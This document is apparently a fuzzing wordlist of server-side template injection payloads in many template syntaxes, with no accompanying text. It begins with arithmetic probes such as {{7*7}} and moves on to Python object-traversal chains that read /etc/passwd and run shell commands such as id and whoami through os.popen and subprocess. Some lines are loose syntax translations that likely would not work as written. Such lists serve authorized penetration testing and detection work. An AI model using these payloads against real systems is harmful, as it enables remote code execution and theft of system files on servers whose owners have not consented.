{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
${{7*7}}
@(7*7)
#{ 7*7 }
{{7*'7'}}
${7*'7'}
<%= 7*'7' %>
#{7*'7'}
${{7*'7'}}
@(7*'7')
#{ 7*'7' }
{{range(1,7)}}{{7*7}}{{end}}
${range(1,7)}${7*7}${end}
<% for i in range(1,7) %><%= 7*7 %><% end %>
#{range(1,7)}#{7*7}#{end}
${{range(1,7)}}${{7*7}}${{end}}
@(range(1,7))@(7*7)@(end)
#{ range(1,7) }#{ 7*7 }#{ end }
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
${''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}
<%= ''.class.mro[2].subclasses[40]('/etc/passwd').read %>
#{''.class.mro[2].subclasses[40]('/etc/passwd').read}
${{''.class.mro[2].subclasses[40]('/etc/passwd').read}}
@(''.class.mro[2].subclasses[40]('/etc/passwd').read)
#{ ''.class.mro[2].subclasses[40]('/etc/passwd').read }
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
${config.__class__.__init__.__globals__['os'].popen('id').read()}
<%= config.class.init.globals['os'].popen('id').read %>
#{config.class.init.globals['os'].popen('id').read}
${{config.class.init.globals['os'].popen('id').read}}
@(config.class.init.globals['os'].popen('id').read)
#{ config.class.init.globals['os'].popen('id').read }
{{self.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
${self.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}
<%= self.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read %>
#{self.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read}
${{self.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read}}
@(self.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read)
#{ self.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read }
{{''.__class__.__bases__[0].__subclasses__()[242]('whoami',shell=True,stdout=-1).communicate()[0].strip()}}
${''.__class__.__bases__[0].__subclasses__()[242]('whoami',shell=True,stdout=-1).communicate()[0].strip()}
<%= ''.class.bases[0].subclasses[242]('whoami',shell=True,stdout=-1).communicate[0].strip %>
#{''.class.bases[0].subclasses[242]('whoami',shell=True,stdout=-1).communicate[0].strip}
${{''.class.bases[0].subclasses[242]('whoami',shell=True,stdout=-1).communicate[0].strip}}
@(''.class.bases[0].subclasses[242]('whoami',shell=True,stdout=-1).communicate[0].strip)
#{ ''.class.bases[0].subclasses[242]('whoami',shell=True,stdout=-1).communicate[0].strip }
